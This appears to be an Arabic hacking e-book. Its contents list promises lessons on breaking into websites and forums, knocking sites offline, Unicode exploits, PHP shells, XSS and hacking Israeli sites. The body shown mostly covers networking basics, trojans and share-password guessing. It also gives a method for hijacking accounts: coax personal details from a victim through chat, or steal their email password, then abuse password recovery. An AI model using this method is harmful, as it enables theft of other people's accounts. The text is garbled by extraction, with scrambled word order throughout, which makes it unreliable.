الياء إلى األلف من إختراق

وجرب الكتاب هذا فى تعبت انا بس ومعك% 100لعيونكم مثلكم عب ال انا يعنى بتاعى بى االيى بغير يوم كل ألنى ذكية ادرة يا تكونى وال بإستمرار

وهمية حسابات كلها حسابى تحددوا تقدر ^^ ما تحياتى

󖅘♥^______^󖅘المحتويات

المقدمة..12. الفهرس.

3. الهاكر. عن عامة مقدمة4. اإلنترنت. في البحث كيفية

5.) األول. ) الجزء اإلنترنت بشبكات خاصة مفاهيم6.) الثاني. ) الجزء اإلنترنت بشبكات خاصة مفاهيم

7. اإلنترنت. عبر األمن8. الشبكات. أمن

9. المواقع. اختراق في للمبتدئين مهمة مصطلحات10. للمبتدئين. المواقع اختراقببرنامج. .11 Webcrackاإلختراق

ببرنامج. .12 MungaBungaاإلختراقالمواقع. 13 تدمير .WinSmurfبرنامج

برنامج. 14 .Evil Pingشرح المواقع لتدمير15. المواقع. لتدمير الدرة برنامج

16. برامج. بدون المواقع تدمير17. التلنت.

عن. 18 .DNSمعلوماتعن. 19 .Routing in the Internetمعلومات

20 .NETBIOS.خدمة. 21 .Fingerبروتوكول

22 .Net. االمر بإستخدام الشبكة إلدارة مختصر شرح23. الـ.  secure shellشرح

الـ. .24 معنى Buffer Overflowsشرح.CGIالـ. 25 باإلنترنت وعالقتها

26.! أفعالك؟. وتخفي نفسك تحمي كيف27. ) ؟؟. ) األول الجزء النت في الهوية مجهول تبقى كيف28. ) ؟؟. ) الثاني الجزء النت في الهوية مجهول تبقى  كيف.HTTP Portبرنامج. 29 ! ! متخفيا النت تتصفح يجعلك الذي

برنامج. .30  NeoTraceشرح31. شبكة. أو موقع عن المعلومات بجمع القيام كيفية

32. الثغرات. عن للبحث سكان عمران برنامج33.) األول. ) الجزء اليونيكود طريق عن اإلختراق34.) الثاني. ) الجزء اليونيكود طريق عن اإلختراق

35. اليونيكود. ثغرات من االستفادة كيفية عن عامة معلوماتسيرفر. 36 إلختراق الكامل .IISالدليل

الـ. .37 في وبعمق مفصلة  UniCodeدراسة38. اليونيكود. بواسطة اإلختراق عملية على تدريب39. المجانية. المواقع اختراق لكيفية مفصل شرح

40. الكوكيز. عن درسمفصلاألسطورة. 41 برنامج .God Willشرح الصفحات تلغيم في

ببرنامج. 42 ومرحبا األسطورة للبرنامج .NOOP4وداعا43. بيج. الفرونت تدعم التي المواقع عن مهمة معلومات

44. بيج. الفرونت تدعم التي المواقع اختراق45. العشوائي. اإلختراق

46. المواقع. اختراق في والمثلى الصحيحة الطريقة47. المواقع. اختراق كيفية عن ومبسطة يسيرة نبذه

48. )> & للمبتدئين. )> المواقع اختراق في ج س.CgiScanerبرنامج. 49 الثغرات عن للبحث

في. 50 المفتوحة المنافذ لمعرفة سكان سوبر برنامج شرحالمواقع.

برنامج. 51 .Shadow Scan Securityشرح الموقع لتحليل52. التشغيل. أنظمة في الباسورد ملف وجود اماكن

53.) األول. ) الجزء الموقع اختراق54.) الثاني. ) الجزء المواقع اختراق55.) الثالث. ) الجزء المواقع اختراق

56.) متوسط. ) المواقع اختراق درسفيملف. 57 .htaccessشرح

الملفات. .58 نقل FTPنظامطريق. .59 عن FTPاإلختراق

الـ. 60 .SQLاختراق61. الـ. عن SQLدرسمفصل

62. المواقع. اختراق في الهاك درسإلحتراف63. المواقع. اختراق لينكسفي استغالل

64. لينكس. طريق عن المواقع اختراق في درساخرمن. 65 مفصل المواقع  الياء إلى األلف شرح اختراق احتراف في

. لينكس طريق عنالـ. 66 (.PHP Shellدرسعن األول ) الجزءالـ. 67 (.PHP Shellدرسعن الثاني ) الجزءالـ. 68 (.PHP Shellدرسعن الثالث ) الجزء

أداة. 69 .anmapشرح70. ثغرات. بدون السيرفرات إلقتحام طريقة

71 .Cross Site Scripting.72. الزوار. سجل تدمير كود

73. صفحة. فايروسفي وضع74. الثغرااات.

75. الثغرات. عن مفصل شبه شرح76. الثغرات. تستخدم كيف

77. الثغرة. هذه مع اإلسرائيلية المواقع بإختراق تمتع78. نيوك. ثغرة

.Chunkedثغرة. 7980. المنتديات. حماية

نوع. 81 من المنتديات .vBulletin2,2,0اختراق82. حمايتها. وطرق المنتديات اختراق كيفية عن درسمفصل

منتديات. 83 في .vBulletin 2,2,9ثغرةمنتديات. 84 .phpbb 2.0.0اختراق

في. 85 .php nukeثغرة86. للهاك. العربية والمواقع المنتديات أفضل

87. اإلنجليزية. والهاك األمن مواقع أفضل88. الخاتمة.

الهاكر " هم "منبرامج احدى بمساعدة الغير ألجهزة اشخاصمخترقون هم الهكرز

عملية تسهل مساندة برامج على إعتماد المشهورة االختراق. بالباتشاوالسيرفر تسمى الحاسبين بين االتصال

- اإلنترنت؟؟ مواقع اختراق يتم كيفالنت عالم في واالبحار البحث الي الكثيرين دفع الذي السؤال هذا

مجانية مواقع توفر التي والسرفرات الصفحات من انواع هناكاالول  النوع

موقعك باسوورد تتذكر لم او نسيت واذا ببياناتك تحتفظ سيرفراتالشخصية بياناتك منك تطلب سوف  فانها

مثل انت اال يعلمها ال التي  السريةالكامل الحقيقي اسمك

وميالدك عمركانت بلد اي  من

آخر سيرفر الي سيرفر من الدقة وتختلفالثاني النوع

فانها نسيته او الباسوورد اضعت واذا ببياناتك تحتفظ سيرفراتعليه مكتوب ايكون علي الضغط فقط منك  تطلب

)) الباسوورد)) نسيتالخاصبك االيميل الي الباسوورد يرسلون ثم ومن

................. ..................................................الشخصواستطعت بيانات عرفت اذا اختراقه يسهل النوع هذا

بياناته تعرف ان وما لبق وباسلوب الطرق بشتي معه  التحدثعلي والضغط الخاصه صفحته الي تذهب ان يمكنك حتي الشخصية

الخاصة البايانات وادخال الباسوورد نسيت انك  ايكونالباسوورد ... تغيير ثم  ومن

والسرية الخاصة الصفحة صاحب بيانات وتغيير..........................

الثاني النوعتمتلك ان التستطيع فانك الباسوورد سرقة حاولت مهما النوع هذا

الباسوورد اليه ترسل سوف الشركة الن طويلة لمدة  الصفحةالجديد .. .. ورقمه الباسوورد سيعرف هنا ومن الجديد

أخري !!! مره الموقع او الصفحة الي ملكيته اعادة وسيتم

؟؟ )) الحل كيف اذاهو ..  الحل

الباسوورد تعرف وحين به الخاص االيميل باسوورد تعرف انللموقع الباسوورد نسيت انك وكتابة الشركة الي الذهاب سيمكنك

للموقع .. .. بالباسوورد سرقته الذي االيميل علي اخطارك فسيتم. بسالم وانت وملكيته سرقتة يمكنك هنا ومن

انتهى،،،" اإلنترنت" في البحث كيفية

> اإلسالمية> الحزم شبكة منتديات من منقول> : هنتر> بالك الكاتب

؟ االنترنت في البحث كيفيةفي ايشيء او ما مشكلة عن او ما برنامج عن نسمع عندما

؟؟ ذلك يتم كيف عنها البحث ونريد االنترنتبالك فما منتدى في بالبحث يقوم ان يقدر ال الشباب ان نجد غالبا

ال ولكن يبحث تجده وقد ؟ االنترنت في عنها البحث تريد بمسئلهالبحث ليسفي والخطأ بنتيجه يحصل

البحث طريقة في بل

تريد ما الى الوصول في تساعدك حتى البحث محركات صنعتمنها لكل البحث محركات ان تعلم ان عليك ولكن ممكن وقت باقصر

ولكن عامه انها العلم مع عمل؟؟ النتائج هي ما

كتبت ماذا يعرف فهو الذكي المحرك اعتبره انا للجوجل مثال بالنسبهتريدها التي غالبا وهي االولى النتائج يعطيك فلذلك

يقدم انه حيث بحت تجاري ذكائه ولكن ذكي ايضا هو للياهو بالنسبهالمحرك معها يتعامل والتي تريد ما تقدم التي التجاريه المواقع لك

يتعامل ال التي التجاريه المواقع ثماحيانا انت ترده ما وهي العامه المواقع ثم المحرك معها

وضحت المسئله ان اعتقد

اخطط ان علي يجب مثال ما برنامج عن ابحث ابغى انا اخوان ياكيف تتعلم انت الزم واسئل المنتديات الى اذهب ان قبل للبحث

 تبحثمن المعلومه هيجيبلك اللي االنسان وبين بينك الفرق وش

ذلك اعتقد ال ؟؟؟ دماغه على ريشه يملك هل ؟ المنتدىاعتقد ال ايضا ؟ للغايه بطئيه وانت للغايه سريعه لديه االنترنت هل

لبعض بالنسبه فشلها اثبتت العاليه السرعات ان العلم مع ذلكاالشخاص

توظفعقولها كيف تعرف ال التي

وكان الخليج في عربيه بدوله لي صديق مع حديث في مره كنت

كامله سنه لي االن انا بالك اخ يا والله لي ويقول بصراحه يحدثنياالنترنت على

خط وبسرعة ISDNمع بباندويث محدد برامج 256غير من اعرف والاتاك الهاك غير االختراق

غير تعرف وال هذه الضاربه القوه ومعك كامله سنه تحطمت انا فعالواالفالم االغاني مواقع بين ما وقتك اكيد انت قلتلله ؟ اتاك الهاك

انا هو هذا ايوالله قال والشات لها لود والداونشيء كل ليست السرعه ان ايقنت فعال وبذلك

تستطيع ال الذي فالسالح السرعه يملك من عقلية شي اهمينفع - ال .  استخدامه هـ- ا

للبحث : التخطيط كيفية بشرح سنقوم االن

المواقع تقسيم عبر وهي جدا بسيطه طريقهتجاريه مواقع

ليونكس )) - (( ويندوز برامج مواقعملتيميديا مواقع

واخباريه سياسيه مواقعهاك مواقعكراك مواقع

سكيوريتي مواقعهاردوير مواقع

منتدياتعالم )) (( لوحده هذا جوجل بحث محرك

الخ ..... مواقع

عنه نبحث ما لنأخذ االن

في مثال ابحث اروح وشيخليني ؟ جدا بسيطه ؟ برنامج مثالوشيخليني حتى او ؟؟؟؟ عام بمحرك ابحث وشيخليني ؟؟؟ الياهو

؟؟؟ بالقوقل ابحث اروحدي زد امثال البرامج مواقع الى فورا انطلق برنامج انه بما خالص

موقع - - - لليونكسفهناك وبالنسبه وغيرها لود داون اتاك ويب نتللويندوز برامجه في لود داون موقع من اقوى انه اعتبره انا

المواقع )) تلك كل ساضع الموضوع اخر فريشميت موقع وهوكمرجع ((

لم ال ؟ العمل انتهى هل ؟ افعل ماذا البرنامج اجد ولم بحثت ان بعدبقرائه وابدا تريد ما عن وابحث الجوجل الى اذهب بعد ينتهي

الصفحه هذه تحوي ماذا يخبرك النوتسالذياليها ادخل تريد ما وجدت واذا

ما )) عمري انا عليه تدور اللي هتالقي ما انك اعتقد ما ؟؟ تجد لمماذا (( ؟ تجد لم انك لنفرض ولكن اريد ما واجد اال هالطريقه سويت

وابحث المنتديات الى اذهب ؟ ستفعلبالمنتدى السوال بامكانك وقتها تجد واذالم تسأل ان قبل

عنه تبحث انت اللي عارف منت انت مثال اخرى نقطة نقطه هذهبالظبط

في موجوده عارف ماني ولكن نوعها عارف ثغره على ادور انا مثال وش

الـ ثغرات مثال اختصارها Cross Site Scripteولتكن او XSSوالليCSS

؟؟؟ وشاسوي مثال اكسبلويت على ادور الثغره على ادور ما اناكلمة عن ابحث السكيوريتي لمواقع اوال كل XSSاذهب هيطلعللك

الجوجل الى اذهب نفسالوقت وفي تريد فيما ابحث ابدا عنها شيوابحثعن مثال

XSS مواقع زي مو والجوجل بعينه شي ابغى انا يكفي ال هذا ولكنولذلك بالوي هيجيب الجوجل ال بسيط هتجيبشي السكيوريتي

عالمه ) + ( عبر البحث بتحديد علي

ان فعلي الثغره باسم وادور اكسبلويت وادور بجز ادور انا يعنياكتب :

XSS+BUG+EXPLOITثغرات ادور هاكتب :IISمثال

IIS+exploit+bug

انه شي اهم عنها تبحث اللي المسئله عن شي كل يطلعللك خليهعنه تبحث ما في مواضيع يجيبلك

تجد لم اذا تريد ما عن الكتابه ثم ومن المنتديات ثم ومنللبحث التخطيط بالنقطه شي اهم

رتب ليونكس؟ واال ويندوز ؟ ببرنامج يتعلق موضوع ؟ ابحث ماذا عنالبحث : ابدا المواقع

ابدا : المواقع رتب ؟ بالشوبرينج يتعلق موضوع ؟ ابحث ماذا عنالبحثوهكذا

جدا تفيدكم المواقع من مجموعه لكم ساضع االنجوجل : /http://www.google.com الملك

ومتقدمه : عاديه بحث http://www.yahoo.com/ - http://www محركات.altavista.com/ - http://www.lycos.com/ - http://hotbot.lycos.com/

اوديو : )) المورفيساو او الكازا مثثل برامجها عبر ملتيميديا مواقعاس (( ام وين او شهره kazaa - WinMXجاالكسي االكثر

واخباريه : سياسيه http://news.bbc.co.uk/hi/arabic/news - ht مواقعtp://arabic.cnn.com/ - http://www.aljazeera.net/

سكيوريتي : http://www.securiteam.com/ - http://www.securi مواقعtyfocus.com/ - http://www.ussrback.com/ - http://

www.ntbugtraq.com/ -http://www.ntsecurity.nu/ - http://www.ntsecurity.com/

هاردوير : http://nvidia.com/ - http://www.asus.com/ - http://d مواقعrivers.on-line.net.nz/ - http://intel.com/ - http://www.amdmb.com/

2.") األول" ) الجزء األنترنت بشبكات خاصة مفاهيم> منقول>

> : الوقيت> عصام الكاتبكل فيه يجد عالم بالمتعة، مليء بالفائدة، مليء عالم اإلنترنت

. ولكن األشخاص واختالف االهتمام مجاالت باختالف يهمه، ما إنسانمن البد أنه إال اإلنترنت في المفيدة األشياء كثرة من الرغم على

" " . يسمون من أو الهاكرز نسميه الكدر هذا الصفو يكدر ما وجود. بعضاألحيان في  بالمخترقين

ال أسئلة ؟ نتقيشرهم وكيف ؟ أهدافهم هي وما ؟ الهاكرز هم منالعالم، أنحاء مختلف في المستخدمين أكثر رأس في دارت أنها بدسواء الهاكرز أذى طالهم الذين المستخدمين أولئك سيما وال

أهون في أو محتوياتها إتالف أو أجهزتهم من معلومات بسرقة. وإرعابهم إخافتهم  األحوال

كوسيلة القارئ، أخي لك نقدمها الحلقات من سلسلة الطيب الهاكريتعلموا لكي مختلفمستوياتهم على المستخدمين لكل تعليميةالتي الحيل يعرفوا ولكي الهاكرز هؤالء شرور يتقون كيف

. القارئ أخي ستكون باختصار بهم األذى إللحاق الهاكرز يستخدمها .. ستكون بل الشر في مثلهم تكون لن ولكن الهاكرز، هؤالء أحد

. الطيب الهاكر

 مقدمة:والمعلومات المهارات بعض لتقديم مخصصة ستكون الحلقة هذه

وهي الهاكرز، شر اتقاء يريد من كل يعرفها أن يجب التي األساسية. اآللي الحاسب شبكات الخاصة والمفاهيم المصطلحات بعض

IPرقم مجرد انها ؟ تحملها التي المدنية األحوال بطاقة الغرضمن ما

. يستحيل بطاقتك على الموجود فالرقم وتعريفك لتمييزك وسيلة. البلد نفس في آخر مواطن ألي  تكراره

الشبكات، ناحية من اآللي الحاسب مجال في ينطبق المبدأ نفسمميز رقم جهاز لكل يعطى واحدة بشبكة المرتبطة األجهزة فلتمييز

الرقم وهذا بنفسالشبكة مرتبط آخر جهاز أي في تكراره يستحيلأو الجهاز بعنوان يسمى ما .IPهو

بالشبكة مرتبطا الجهاز يكون والتي الدائمة الشبكات حالة في . يتم مالم دائما للجهاز ثابتا الرقم هذا يكون الشبكة، أسالك بواسطة

الهاتفي االتصال حالة في ولكن دائم، بشكل الشبكة من الجهاز نزعتدخل الذي الخدمة موفر على اتصلت كلما يتغير الجهاز عنوان فإن

. خالله من  للشبكةأتصل عندما جهازي عنوان أعرف كيف تتساءل اآلن لعلك

على انقر الوندوز في المهام شريط من جدا سهل األمر باالنترنت؟Start ثمrun أدخل باعتماد. winipcfgثم وندوز تستخدم كنت إذا

" " " اكتب " ثم تشغيل ثم ابدأ اختر العربية  .winipcfgاللغة

الـ أرقام IPتوزيعرقم كان لماذا تساءلت وأن سبق هو IPهل 212.33.40.1الخاصبك

الـ 24.5.66.3وليس ارقام تبدأ لماذا تساءلت وأنت سبق وهل ،IP في بالرقم أرقام 212السعودية إن الحقيقة في ؟ آخر رقم وليسبأي

IP " بل " يريد ما يأخذ كل بطريقة أو عشوائية بطريقة توزيعها اليتمأرقام توزيع على تشرف منظمات هناك على IPبالعكسيوجد

معرفة عند الجهة معرفة يتم بحيث الدول داخل والمؤسسات الدول.IPرقم تمتلكه الذي

منظمة على )IANA)Internet Assigned Numbers Authorityتشرفأرقام على IPتوزيع باإلشراف تقوم أنها حيث العالم، مستوى على

من معين جزء عن مسؤولة منظمة كل وتكون فرعية منظمات ثالث: هي الفرعية المنظمات وهذه العالم

وتشرف )ARIN )American Registry for Internet Numbersمنظمة- 1من وأجزاء الكاريبية والمناطق والجنوبية الشمالية أمريكا على

افريقيامنطقة )RIPE )Réseaux IP Européensمنظمة- 2 على وتشرف

افريقيا من وأجزاء األوسط والشرق أوروبا )APNIC )Asia Pasific Network Information Centerمنظمة- 3

آسيا على وتشرف

ارقام توزيع على باإلشراف منظمة كل تحت IPتقوم الواقعة للدول . معرفة من تمكنك بيانات قاعدة منظمة لكل ويوجد اشرافها مجال

رقم بخدمة IPصاحب الخدمة هذه وتسمى تقوم whoisمعين حيثرقم عن IPبإدخال معلومات على وستحصل معينة لمنظمة التابع

هذا يمتلك رقم IPمن صاحب لمعرفة المملكة IPفمثال في معينبالذهاب قم السعودية العربية

رقم  http://www.ripe.net/db/whois.html للموقع وستحصل IPوأدخل. الرقم هذا صاحب عن متكاملة معلومات على

الـ IPعائلةالـ رقم أن المعروف كالتالي IPمن أقسام أربعة من يتكون

تتراوح 10.10.10.1 قيمة له تكون أن يمكن األقسام هذه من قسم كلالمجال ) 255و 0بين ليسهذا التي بعضاالستثناءات وجود مع

الجهة( من أقسام ثالثة أول أن معرفته يجب الذي الشيء لذكرها

رقم من بحيث IPاليسرى معين خدمة لمزود محجوزة تكون ما غالباال أرقام جميع الجهة IPتكون من أقسام ثالثة أول بها يتشابه التي

. رقم يحمل الذي الجهاز فمثال الخدمة لنفسمزود تنتمي IPاليسرىرقم 212.26.75.34 يحمل الذي ما IP 212.26.75.201والجهاز غالبا

. الخدمة لنفسمزود  ينتميانرقم بواسطة الخدمة مزود رقم ) IPولمعرفة أي آخر IPالثالثي بدون

على ( المشرفة المنظمة موقع زيارة يمكنك اليمنى الجهة من رقمرقم له ينتمي الذي خدمة IPالبلد .whoisواستخدام بها الخاصة

للموقع بالذهاب قم أعاله المثال في الخدمة مزود لمعرفة فمثال،http://www.ripe.net/db/whois.html  الرقم في 212.26.75وأدخل

الزر انقر ثم ومن الصفحة في الموجود وستحصل searchالمربع. الخدمة مزود عن المخزنة المعلومات جميع  على

Portالمنفذ من واحد كل وأن األبواب من العديد فيه منزال تخيل ؟ المنفذ ماهو

وباب الضيوف الستقبال فباب ، معينة لخدمة مخصص األبواب هذه . على ينطبق المبدأ نفس الخدمات لدخول آخر وباب للخدم آخر

خادم مثل الخدمات من العديد على يحتوي فالجهاز اآللي الحاسبالملفات web serverالويب . ftp serverوخادم تطبيق فكل وغيرها

من نوع وهذا بياناته واستقبال الرسال يستخدمه معين منفذ لديهالمنفذ على تكون ما غالبا الويب خدمة فمثال وخدمة 80التنظيم

المنفذ على تكون عدة 21الملفات على يكون ميتنغ النت وبرنامجمنها . 1720منافذ عندما فبالتالي معين منفذ له يكون تطبيق وكل

ألي الجهاز يعرف فسوف معين منفذ على للجهاز بيانات تأتييقوم الذي التطبيق لهذا بإرسالها ويقوم البيانات هذه تنتمي تطبيق

بمعالجتها.

DNS ؟ ماهوفي مشكلة أي تواجه وال أصدقائك أسماء تتذكر بالطبع أنت

رقما ؟كم هواتفهم أرقام عن ماذا ولكن ذاكرتك من استرجاعهاتستطيع فلن جيدة ذاكرتك كانت مهما عشرة؟ ؟ اثنان ؟ منها تحفظنسيان أن الحقيقة فتبقى فعلت وإن كلها هواتفهم أرقام حفظ

. فكرة جاءت المبدأ هذا من األسماء نسيان من سهولة أكثر األرقامDNS .المفروضأن من كان االنترنت استخدام بداية في أنه حيث

الجهاز عنوان موقع .. IPتحفظ لزيارة فمثال موقع أن CNNلكل يجبمن 207.145.53.10تكتب خبراء  www.cnn.com بدال الحظ ثم ومن

قادرة .. غير البشرية فالذاكرة جدا صعبا سيكون ذلك أن الحاسبللـ التوجه تم هنا ومن األرقام من الكثير حفظ عبارة DNSعلى وهو

األجهزة أسماء عن عبارة هي معلومات يحفظ خادم جهاز عنالموقع IPوأرقام اسم بإرسال المستخدمون يقوم حيث بها الخاصة

مزود رقم ) DNSالى بعنوانه عليهم ( IPليرد على فلتدخل به الخاصسيقوم  www.cnn.com موقع الذي المستعرض في تكتبها ان يكفي

االسماء لخادم عنوان DNSبإرسالها الى بتحويلها سيقوم والذيالخاصبشبكة الويب خادم مع التخاطب جهازك يستطيع الجهازحتى

... األسماء خادم بأن القول يمكن اختصارا، ان ان اال DNSسي ماهو

االنترنت في االجهزة اسماء فيها بيانات قاعدة على يحتوي جهاز.IPوأرقام بها الخاصة

 netstatاألمر وبين جهازك بين تخاطب هناك يكون أن المستحيل من بأنه تعلم هلرقم الجهازين من كل لدى يكون أن بدون اإلنترنت في آخر جهاز أي

من IPالـ نوع أي نقل هو بالتخاطب وأقصد اآلخر؟ بالجهاز الخاصإلىشخصمعين. رسالة ترسل فلكي ضروري شيء هذا البيانات

يقوم لكي عنوانك يعرف أن أيضا هو ويجب عنوانه تعرف أن فيجب. . وقتها في عنها سنتحدث استثناءات عدة هناك بالطبع عليك بالرد

باالتصال التخاطب هذا يسمى الشبكات نظام طبعا. connectionفيويسمى االتصال بطلب يقوم من هناك يكون أن يجب اتصال لكل

أو ويسمى Clientعميل عليه االتصال يتم من أيضا هناك ويكون.serverمزود

األجهزة جميع بمعرفة لك الدوسيسمح نظام في أمر هناكالبيانات ) واستقبال بارسال جهازك يقوم التي أو بجهازك المتصلة

المتفذ( ) ومعرفة ) portمنها هي( المنفذ فائدة االتصال عليه تم الذي ) األمر هو األمر وهذا عليه االتصال تم الذي التطبيق ما netstatتحديد

بتشغيل تقوم أن إال برامج ms-dos promptعليك قائمة منprograms هذه بكل قائمة على وستحصل األمر هذا اكتب ثم ومن

. الجهازين كال في االتصال عليه تم الذي المنفذ مع األجهزة

Internet Relay Chat( IRCالمحادثة )محادثة مزود وجود هي المحادثة نظام عمل chat serverطريقة

محادثة برنامج شخص chat clientووجود أراد إذا بحيث جهاز كل فيبدوره والذي ، المحادثة برنامج بتشغيل يقوم للمحادثة الدخول . الشخص يتمكن االتصال إجراء وبعد المحادثة بمزود باالتصال يقوم

أيضا يمكنه كما المزود في الموجودة الغرف من ألي الدخول منالوظائف من بالعديد القيام أيضا يمكنه كما به، الخاصة الغرف انشاء

. لذكرها المجال ليسهذا التييعرف معه بالتخاطب جهازك يقوم جهاز كل أن السابق في قلنا

الـ بالشكل IPرقم الكالم هذا يفهم ال أن يجب ولكن الخاصبك،المحادثة نظام في فمثال بمزود IRCالخاطيء باالتصال أنت تقوم

المستخدمين، chat serverالمحادثة لجميع بالنسبة الحال وكذلكاألشخاص جميع وبين بينك كالوسيط المزود هذا يكون بحيث

برنامج يقوم لشخصما، رسالة بإرسال تقوم فلكي به، المتصلينيقوم بدوره والذي المحادثة لمزود الرسالة بإرسال المحادثة

أي وبين بينك مباشر اتصال يوجد ال فإنه للشخصوبالتالي بإرسالهاالمحادثة برامج أن تالحظ ولها المحادثة، نظام خالل شخصآخر

رقم تعطيك ما التالي ) IPغالبا بالشكل ناقصا اآلخرين لألشخاص111.222.333.XXX ) ال حتى للمستخدمين الحماية من نوع فيه وهذا

الـ رقم معرفة من الهاكرز ثم IPيتمكن ومن للمستخدم الكامل. إليه للوصول استخدامه

نظام في شخصآخر ألي يمكن حيث النظام، لهذا استثناءان هناكرقم معرفة :IPالمحادثة , كالتالي وهما الخاصبك الكامل

بها. 1 دخلت التي الغرفة على الشخصمشرفا كون حالة فيمنحه) تم الذي الشخص أو الغرفة أنشأ الذي الشخص هو المشرف

) على يحصل المشرف أن حيث ، الغرفة أنشأ من قبل من الصالحيةالـ .IPرقم غرفته شخصدخل لكل الكامل

2 : فمزود. المحادثة نظام شخصفي مع الملفات تبادلك حالة فيحالة في أما النصوصفقط، نقل في الوسيط بدور يقوم المحادثة

الـ رقم الجهازين كال بإعطاء يقوم فإنه الملفات الخاص IPنقل. مباشر بشكل بينهما البيانات بنقل يقومان بحيث اآلخر  بالجهاز

مخصصة تكون التي للغرف الدخول من احذر أعاله، ذكر مما ) على ) سيحصل الغالب في هاكر وهو المشرف أنه حيث للهاكرز،

. IPرقم وأيضا االختراق لخطر يعرضجهازك مما مباشرة الخاصبكيعرضعليك ممن أو تعرفهم ال ممن الملفات استقبال من احذر

الحصول يكون ربما الوحيد غرضه ألن سبب، بدون الملفات إرسال. الخاصبك بي اآلي رقم  على

؟ الموقع صاحب منهو من نفسك في وتساءلت وأعجبك، موقعا زرت قد أنك البد

) تحتار ) ألن داعي ال مؤسسة أو شخصا كان سواء الموقع هذا صاحبللموقع تذهب أن فيكفي اآلن -www.networksolutions.com/cgi بعد

bin/whois/whois /   دون من الموقع اسم بإدخال مثل ) wwwوتقومwagait.com ) بتسجيل قام الذي الشخص اسم على وستحصل

من والفاكسوغيرها هاتفه ورقم البريدي وعنوانه الموقع . قد المعلومات فهذه بالطبع بالموقع المتعلقة األخرى المعلومات

. الموقع اسم بحجز قام عندما بإدخالها الموقع صاحب  قامإنتهى .

") الثاني" ) الجزء اإلنترنت بشبكات خاصة مفاهيمهو ما تعرف أن أوال يجب خطر أي من نفسك تحمي كيف تعرف لكي

من نفسك تحمي كيف تعرف أن بإمكانك يصبح ثم ومن الخطر هذانعرف أن يجب اللصوص، من أنفسنا نحمي لكي فمثال الخطر، هذانقفل. فنحن شرهم، نتقي كيف نعرف أن يجب ثم ومن خطرهم

تركناها حال في منها يدخلون اللصوصقد أن لمعرفتنا األبوابكيف. تعرف فلكي اآللي، للحاسب بالنسبة الحال هو كذلك مفتوحة

يقومون كيف تعرف أن يجب الهاكرز، شرور من نفسك تحمي. أجهزتنا إلى منها يدخلون التي األبواب هي وما جهازك، باختراق

الشبكات، ومفاهيم بعضمصطلحات عن تكلمنا السابقة الحلقة فيوهي الحلقة هذه في عنه سنتحدث ما معرفة على تساعدك والتي ) بعملية ) القيام من الهاكرز المخترقين تمكن التي والبرامج الطرق

هذا كان سواء اإلنترنت، لشبكة المستخدمين ألجهزة االختراقالتخريب لغرض أو الملفات التجسسوسرقة لغرض االختراق

. نذكر ولن تلميحا، البرامج لهذه سنلمح فإننا بالطبع الملفات ومسح. استغاللها إساءة يتم ال حتى وذلك  أسماءها

(:Virusesالفيروسات- )1تتوجه اآللي، الحاسب في الموجودة األخطار عن التحدث يتم عندما

النتشارها نظرا الفيروسات، في للتفكير تلقائيا المستمعين أذهان . من ولعله اآللي الحاسب أجهزة على التخريبية تأثيرها وقوة

عدم  المناسب) الكل ) يكن لم إن فالغالبية الفيروسات، عن الحديث في اإلطالة

. المستخدمين أجهزة على وتأثيرها خطرها  يعرفون

(:Trojansالتروجان- )2أنها ظاهرها في يكون التي البرامج هي طروادة أحصنة أو التروجان

وخلف الحقيقة في ولكنها للمستخدم مفيدة وظيفة بأداء تقوم ) علم ) بدون مخربة غالبا أخرى وظيفة بعمل الكواليستقوم

نظرا. اإلنترنت، في بكثرة النوعية هذه انتشرت وقد المستخدممن للمخترقين تعطيه لما ونظرا بها المستخدم انخداع لسهولةجهاز في الكامل شبه التحكم إلى بعضاألحيان في تصل إمكانيات

. الضحية المستخدمالمسماة التروجان اإلنترنت في المنتشرة التروجان أشهر من لعل

" باس " نت " " NetBusبـ اوريفيس باك سب "Back Orificeو ويقوم . SubSevenسيفين " أن وهي متشابهة عملها وطريقة

يقوم والتي الملفات أحد في التروجان بإخفاء المخترقتقوم الملفات هذه بأن منهم ظنا بسحبها اآلخرون المستخدمون

فإنه الملف هذا بتنفيذ المستخدم يقوم وعندما لهم، مفيدة بوظائفيتمكن بحيث جهازه داخل للتروجان خادم بتركيب علمه وبدون يقوم

للتروجان ) عميل برنامج باستخدام في( clientالمخترق التحكم من. الضحية المستخدم  جهاز

القيام من المخترق تمكن التي الوظائف في التروجان هذه تتشابهمثل ) الجهاز التجسسعلى الوظائفمن خطورة وتتراوح بها، ) حتى المختلفة السر وكلمات اإللكتروني والبريد الملفات سرقة

المضغوطة ) األقراص بإخراج المستخدم بجهاز أو( CD-ROMالعبثمن وغيرها ملفصوت تشغيل أو للمستخدم مضحكة رسالة إظهار

. المزعجة األخرى  الوظائف

المختلفة الوظائف فيها باسويظهر نت برنامج واجهة تبين صورةبها القيام للهاكر يمكن  التي

3: ويندوز- في والملفات الطباعة في المشاركةأحد بتحديد للمستخدم يسمح ويندوز نظام أن المعروف منأشخاص قبل من للمشاركة جهازه في الصلبة األقراص أو المجلدات . ولها جدا مفيدة الخاصية هذه فإن بالطبع الشبكة على آخرين

متصال تكون عندما ولكن للمستخدم، نافعة كثيرة تطبيقاتالمجلدات هذه يرى أن سيستطيع جهازك يرى من كل فإن باإلنترنت

هو عليها للدخول الوحيد العائق ويبقى للمشاركة وضعتها التي " . اآلخرون يستطيع كيف تتساءل قد طبعا السر كلمة على الحصول

" اإلنترنت على األجهزة من الماليين ضمن جهاز وأنا ؟ لي الوصولفلن ) قلنا وكما البرامج من الكثير يتوافر أنه لك أقول أن يؤسفنيللشخصمن ( تمكن والتي استخدامها يساء ال حتى أسماءها نذكر

. المستخدمين أجهزة في للمشاركة الموضوعة المجلدات عن البحثأن إال المخترق على ما فإنه األجهزة بهذه قائمة على الحصول وبعد

( " ويوجد " السر كلمة تخمين بمحاولة يقوم برنامج بتشغيل يقوم ) آالف بتجريب تقوم والتي النوع هذا من البرامج من الكثير أيضاكلمة إلى تصل ملفحتى في مسبقا تخزينها تم والتي الكلمات

. أن بلة الطين يزيد وما للمشاركة الموضوع بالمجلد الخاصة السربكامله !! الصلب القرص بمشاركة يقومون المستخدمين بعض

مما !! حرفين أو حرف من بسيطة سر كلمة يستخدم وبعضهميسرق الملفات أي في يحتار ويجعله الهاكر على المهمة يسهل

يترك !! وأيها

المشاركة الموضوعة المجلدات عن بالبحث تقوم التي البرامج  أحد

4: المخزنة- السر كلمة سرقةلكي وذلك ملف في السر كلمة بتخزين ويندوز نظام يقوم

يتم السر كلمة فإن بالطبع إليها، الحاجة حالة في بسرعة يسترجعها( مشفر بشكل على ( encryptedتخزينها يستعصي شيء ال ولكن ،

